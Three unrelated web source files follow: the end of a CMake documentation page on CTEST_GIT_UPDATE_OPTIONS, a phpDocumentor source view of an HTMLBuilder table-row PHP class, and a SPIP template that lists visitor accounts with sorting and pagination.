title="General Index" accesskey="I">index</a></li> <li class="right" > <a href="CTEST_HG_COMMAND.html" title="CTEST_HG_COMMAND" accesskey="N">next</a> |</li> <li class="right" > <a href="CTEST_GIT_UPDATE_CUSTOM.html" title="CTEST_GIT_UPDATE_CUSTOM" accesskey="P">previous</a> |</li> <li> <img src="../_static/cmake-logo-16.png" alt="" style="vertical-align: middle; margin-top: -2px" /> </li> <li> <a href="https://cmake.org/">CMake</a> &#187; </li> <li> <a href="../index.html">3.15.1 Documentation</a> &#187; </li> <li class="nav-item nav-item-1"><a href="../manual/cmake-variables.7.html" accesskey="U">cmake-variables(7)</a> &#187;</li> </ul> </div> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body" role="main"> <div class="section" id="ctest-git-update-options"> <span id="variable:CTEST_GIT_UPDATE_OPTIONS"></span><h1>CTEST_GIT_UPDATE_OPTIONS<a class="headerlink" href="#ctest-git-update-options" title="Permalink to this headline">¶</a></h1> <p>Specify the CTest <code class="docutils literal notranslate"><span class="pre">GITUpdateOptions</span></code> setting in a <span class="target" id="index-0-manual:ctest(1)"></span><a class="reference internal" href="../manual/ctest.1.html#manual:ctest(1)" title="ctest(1)"><code class="xref cmake cmake-manual docutils literal notranslate"><span class="pre">ctest(1)</span></code></a> dashboard client script.</p> </div> </div> </div> </div> <div class="sphinxsidebar" role="navigation" aria-label="main navigation"> <div class="sphinxsidebarwrapper"> <h4>Previous topic</h4> <p class="topless"><a href="CTEST_GIT_UPDATE_CUSTOM.html" title="previous chapter">CTEST_GIT_UPDATE_CUSTOM</a></p> <h4>Next topic</h4> <p class="topless"><a href="CTEST_HG_COMMAND.html" title="next chapter">CTEST_HG_COMMAND</a></p> <div role="note" aria-label="source link"> <h3>This Page</h3> <ul class="this-page-menu"> <li><a href="../_sources/variable/CTEST_GIT_UPDATE_OPTIONS.rst.txt" rel="nofollow">Show Source</a></li> </ul> </div> <div id="searchbox" style="display: none" role="search"> <h3>Quick search</h3> <div class="searchformwrapper"> <form class="search" action="../search.html" method="get"> <input type="text" name="q" /> <input type="submit" value="Go" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div> <script type="text/javascript">$('#searchbox').show(0);</script> </div> </div> <div class="clearer"></div> </div> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" title="General Index" >index</a></li> <li class="right" > <a href="CTEST_HG_COMMAND.html" title="CTEST_HG_COMMAND" >next</a> |</li> <li class="right" > <a href="CTEST_GIT_UPDATE_CUSTOM.html" title="CTEST_GIT_UPDATE_CUSTOM" >previous</a> |</li> <li> <img src="../_static/cmake-logo-16.png" alt="" style="vertical-align: middle; margin-top: -2px" /> </li> <li> <a href="https://cmake.org/">CMake</a> &#187; </li> <li> <a href="../index.html">3.15.1 Documentation</a> &#187; </li> <li class="nav-item nav-item-1"><a href="../manual/cmake-variables.7.html" >cmake-variables(7)</a> &#187;</li> </ul> </div> <div class="footer" role="contentinfo"> &#169; Copyright 2000-2019 Kitware, Inc. and Contributors. Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.7.2. </div> </body> </html>
src/htmlbuilder/phpdoc/__filesource/fsource_Elements__ElementsTableTr.php.html
lasso/textura
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- template designed by Marco Von Ballmoos --> <title>File Source for Tr.php</title> <link rel="stylesheet" href="../media/stylesheet.css" /> </head> <body> <h1>Source for file Tr.php</h1> <p>Documentation is available at <a href="../Elements/_Elements---Table---Tr.php.html">Tr.php</a></p> <div class="src-code"> <div class="src-code"><ol><li><div class="src-line"><a name="a1"></a><span class="src-php">&lt;?php</span></div></li> <li><div class="src-line"><a name="a2"></a><span class="src-doc">/**</span></div></li> <li><div class="src-line"><a name="a3"></a><span class="src-doc">&nbsp;*&nbsp;The&nbsp;&lt;tr&gt;&nbsp;tag&nbsp;defines&nbsp;a&nbsp;row&nbsp;in&nbsp;an&nbsp;HTML&nbsp;table.</span></div></li> <li><div class="src-line"><a name="a4"></a><span class="src-doc">&nbsp;*&nbsp;</span></div></li> <li><div class="src-line"><a name="a5"></a><span class="src-doc">&nbsp;*&nbsp;A&nbsp;tr&nbsp;element&nbsp;contains&nbsp;one&nbsp;or&nbsp;more&nbsp;th&nbsp;or&nbsp;td&nbsp;elements.</span></div></li> <li><div class="src-line"><a name="a6"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-inlinetag">{@link&nbsp;http://www.w3schools.com/tags/tag_tr.asp&nbsp;}</span></div></li> <li><div class="src-line"><a name="a7"></a><span class="src-doc">&nbsp;*&nbsp;</span></div></li> <li><div class="src-line"><a name="a8"></a><span class="src-doc">&nbsp;*&nbsp;PHP&nbsp;version&nbsp;5</span></div></li> <li><div class="src-line"><a name="a9"></a><span class="src-doc">&nbsp;*&nbsp;</span></div></li> <li><div class="src-line"><a name="a10"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@example</span><span class="src-doc">&nbsp;&nbsp;&nbsp;simple.php&nbsp;How&nbsp;to&nbsp;use</span></div></li> <li><div class="src-line"><a name="a11"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@filesource</span></div></li> <li><div class="src-line"><a name="a12"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@category</span><span class="src-doc">&nbsp;&nbsp;Element</span></div></li> <li><div class="src-line"><a name="a13"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@package</span><span class="src-doc">&nbsp;&nbsp;&nbsp;Elements</span></div></li> <li><div class="src-line"><a name="a14"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@author</span><span class="src-doc">&nbsp;&nbsp;&nbsp;&nbsp;Jens&nbsp;Peters&nbsp;&lt;jens@history-archive.net&gt;</span></div></li> <li><div class="src-line"><a name="a15"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@copyright</span><span class="src-doc">&nbsp;2011&nbsp;Jens&nbsp;Peters</span></div></li> <li><div class="src-line"><a name="a16"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@license</span><span class="src-doc">&nbsp;&nbsp;&nbsp;http://www.gnu.org/licenses/lgpl.html&nbsp;GNU&nbsp;LGPL&nbsp;v3</span></div></li> <li><div class="src-line"><a name="a17"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@version</span><span class="src-doc">&nbsp;&nbsp;&nbsp;1.1</span></div></li> <li><div class="src-line"><a name="a18"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@link</span><span class="src-doc">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://launchpad.net/htmlbuilder</span></div></li> <li><div class="src-line"><a name="a19"></a><span class="src-doc">&nbsp;*/</span></div></li> <li><div class="src-line"><a name="a20"></a>namespace&nbsp;<span class="src-id">HTMLBuilder</span>\<span class="src-id">Elements</span>\<span class="src-id"><a href="../Elements/General/Table.html">Table</a></span><span class="src-sym">;</span></div></li> <li><div class="src-line"><a name="a21"></a>use&nbsp;<span class="src-id">HTMLBuilder</span>\<span class="src-id"><a href="../Main/Validator.html">Validator</a></span><span class="src-sym">;</span></div></li> <li><div class="src-line"><a name="a22"></a>use&nbsp;<span class="src-id">HTMLBuilder</span>\<span class="src-id">Elements</span>\<span class="src-id"><a href="../Elements/Base/Root.html">Root</a></span><span class="src-sym">;</span></div></li> <li><div class="src-line"><a name="a23"></a>&nbsp;</div></li> <li><div class="src-line"><a name="a24"></a><span class="src-doc">/**</span></div></li> <li><div class="src-line"><a name="a25"></a><span class="src-doc">&nbsp;*&nbsp;The&nbsp;&lt;tr&gt;&nbsp;tag&nbsp;defines&nbsp;a&nbsp;row&nbsp;in&nbsp;an&nbsp;HTML&nbsp;table.</span></div></li> <li><div class="src-line"><a name="a26"></a><span class="src-doc">&nbsp;*&nbsp;</span></div></li> <li><div class="src-line"><a name="a27"></a><span class="src-doc">&nbsp;*&nbsp;A&nbsp;tr&nbsp;element&nbsp;contains&nbsp;one&nbsp;or&nbsp;more&nbsp;th&nbsp;or&nbsp;td&nbsp;elements.</span></div></li> <li><div class="src-line"><a name="a28"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-inlinetag">{@link&nbsp;http://www.w3schools.com/tags/tag_tr.asp&nbsp;}</span></div></li> <li><div class="src-line"><a name="a29"></a><span class="src-doc">&nbsp;*&nbsp;</span></div></li> <li><div class="src-line"><a name="a30"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@category</span><span class="src-doc">&nbsp;&nbsp;&nbsp;Element</span></div></li> <li><div class="src-line"><a name="a31"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@example</span><span class="src-doc">&nbsp;&nbsp;&nbsp;&nbsp;simple.php&nbsp;see&nbsp;HOW&nbsp;TO&nbsp;USE</span></div></li> <li><div class="src-line"><a name="a32"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@example</span><span class="src-doc">&nbsp;&nbsp;&nbsp;&nbsp;debug.php&nbsp;see&nbsp;HOW&nbsp;TO&nbsp;DEBUG</span></div></li> <li><div class="src-line"><a name="a33"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@package</span><span class="src-doc">&nbsp;&nbsp;&nbsp;&nbsp;Elements</span></div></li> <li><div class="src-line"><a name="a34"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@subpackage</span><span class="src-doc">&nbsp;General</span></div></li> <li><div class="src-line"><a name="a35"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@author</span><span class="src-doc">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Jens&nbsp;Peters&nbsp;&lt;jens@history-archiv.net&gt;</span></div></li> <li><div class="src-line"><a name="a36"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@license</span><span class="src-doc">&nbsp;&nbsp;&nbsp;&nbsp;http://www.gnu.org/licenses/lgpl.html&nbsp;GNU&nbsp;LGPL&nbsp;v3</span></div></li> <li><div class="src-line"><a name="a37"></a><span class="src-doc">&nbsp;*&nbsp;</span><span class="src-doc-coretag">@link</span><span class="src-doc">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://launchpad.net/htmlbuilder</span></div></li> <li><div class="src-line"><a name="a38"></a><span class="src-doc">&nbsp;*/</span></div></li> <li><div class="src-line"><a name="a39"></a><span class="src-key">class&nbsp;</span><a href="../Elements/General/Tr.html">Tr</a>&nbsp;<span class="src-key">extends&nbsp;</span><a href="../Elements/General/RootRow.html">RootRow</a>&nbsp;<span class="src-sym">{</span></div></li> <li><div class="src-line"><a name="a40"></a>&nbsp;</div></li> <li><div class="src-line"><a name="a41"></a>&nbsp;&nbsp;&nbsp;&nbsp;<span class="src-key">public&nbsp;</span><span class="src-key">function&nbsp;</span><a href="../Elements/General/Tr.html#methodinitElement">initElement</a><span class="src-sym">(</span><span class="src-sym">)&nbsp;</span><span class="src-sym">{</span></div></li> <li><div class="src-line"><a name="a42"></a>&nbsp;</div></li> <li><div class="src-line"><a name="a43"></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span class="src-var">$this</span><span class="src-sym">-&gt;</span><a href="../Elements/Base/Root.html#var$_allowedChildren">_allowedChildren</a>&nbsp;=&nbsp;<span class="src-key">array&nbsp;</span><span class="src-sym">(</span></div></li> <li><div class="src-line"><a name="a44"></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span class="src-str">&quot;th&quot;</span><span class="src-sym">,</span></div></li> <li><div class="src-line"><a name="a45"></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span class="src-str">&quot;td&quot;</span></div></li> <li><div class="src-line"><a name="a46"></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<span class="src-sym">)</span><span class="src-sym">;</span></div></li> <li><div class="src-line"><a name="a47"></a>&nbsp;&nbsp;&nbsp;&nbsp;<span class="src-sym">}</span></div></li> <li><div class="src-line"><a name="a48"></a><span class="src-sym">}</span></div></li> </ol></div> </div> <p class="notes" id="credit"> Documentation generated on Sat, 22 Dec 2012 00:28:49 +0100 by <a href="http://www.phpdoc.org" target="_blank">phpDocumentor 1.4.4</a> </p> </body> </html>
prive/objets/liste/visiteurs.html
denisbz/SPIP
[(#SET{defaut_tri,#ARRAY{ statut,1, multi nom,1, site,1 }}) ]<B_liste_aut> #SET{afficher_lettres,#TRI|=={'multi nom'}|oui} #SET{debut,#ENV{debutaut,#EVAL{_request("debutaut");}}} #ANCRE_PAGINATION [<h3><:info_resultat_recherche:> &laquo;(#ENV{recherche})&raquo;</h3>] <div class="liste-objets visiteurs"> <table class='spip liste'> [<caption><strong class="caption">(#ENV*{titre,#GRAND_TOTAL|singulier_ou_pluriel{info_1_visiteur,info_nb_visiteurs}})</strong></caption>] <thead> #SET{p,''} <BOUCLE_lettre(AUTEURS){tout}{id_auteur?}{where?}{statut?}{recherche?}{par multi nom}{id_auteur==#GET{afficher_lettres}|?{'.*','A'}}>[ (#NOM**|extraire_multi|initiale|unique|oui) [(#SET{p,#GET{p}|concat{ #SELF|parametre_url{debutaut,@#ID_AUTEUR}|ancre_url{paginationaut}|afficher_initiale{#NOM**|extraire_multi|initiale{},#COMPTEUR_BOUCLE,#GET{debut},#ENV{nb,10}} }})] ]#SAUTER{#ENV{nb,10}|moins{#COMPTEUR_BOUCLE|=={1}|?{2,1}}}</BOUCLE_lettre>[ (#SET{p, #GET{p}|concat{ #REM|afficher_initiale{#REM,#TOTAL_BOUCLE,#GET{debut},#ENV{nb,10}} } })]</B_lettre> [<tr><td colspan="5"><p class='pagination'>(#GET{p})</p></td></tr>] [<tr><td colspan="5"><p class='pagination'>(#PAGINATION{prive})</p></td></tr>] <tr class='first_row'> <th class='statut' scope='col'>[(#TRI{statut,#CHEMIN_IMAGE{auteur-0minirezo-16.png}|balise_img{<:lien_trier_statut|attribut_html:>},ajax})]</th> <th class='messagerie' scope='col'></th> <th class='nom' scope='col'>[(#TRI{multi nom,<:info_nom:>,ajax})]</th> <th class='email' scope='col'>[(#TRI{email,<:email:>,ajax})]</th> <th class='contributions' scope='col'><:info_contributions:></th> </tr> </thead> <tbody> <BOUCLE_liste_aut(AUTEURS){tout}{id_auteur?}{where?}{statut?}{recherche?}{tri #ENV{par,multi nom},#GET{defaut_tri}}{pagination #ENV{nb,10} aut}{!compteur_articles_filtres #ENV{filtre_statut_articles,poubelle}}> <tr class="[(#COMPTEUR_BOUCLE|alterner{row_odd,row_even})][ (#EXPOSE|unique)][ (#NOM**|extraire_multi|initiale|=={#ENV{i}}|?{on}|unique)]"> <td class='statut'>[(#STATUT|puce_statut{auteur})]</td> <td class="messagerie">[<a href="(#ID_AUTEUR|auteur_lien_messagerie{#EN_LIGNE,#STATUT,#IMESSAGE})">[(#CHEMIN{images/m_envoi.gif}|balise_img{<:info_envoyer_message_prive:>})]</a>]</td> <td class='nom[ (#NOM|non)vide]'>[(#LOGO_AUTEUR|image_reduire{20,26})]<a href="[(#ID_AUTEUR|generer_url_entite{auteur})]"[ title="(#BIO*|couper{200}|attribut_html)"]>[(#RANG). ][(#NOM|sinon{<:texte_vide:>})]</a></td> <td class='email'>[<a href='mailto:(#EMAIL)'>[(#EMAIL|couper{30})]</a>]</td> <td class='contributions'>[(#COMPTEUR_ARTICLES|singulier_ou_pluriel{info_1_article,info_nb_articles})<br />][(#PIPELINE{'compter_contributions_auteur',#ARRAY{args,#ARRAY{id_auteur,#ID_AUTEUR},'data',#ARRAY{}}}|implode{'<br />'})]</td> </tr> </BOUCLE_liste_aut> </tbody> </table> [<p class='pagination'>(#PAGINATION{prive})</p>] </div> </B_liste_aut>[ <div class="liste-objets auteurs caption-wrap"><strong class="caption">(#ENV*{sinon,''})</strong></div> ]<//B_liste_aut>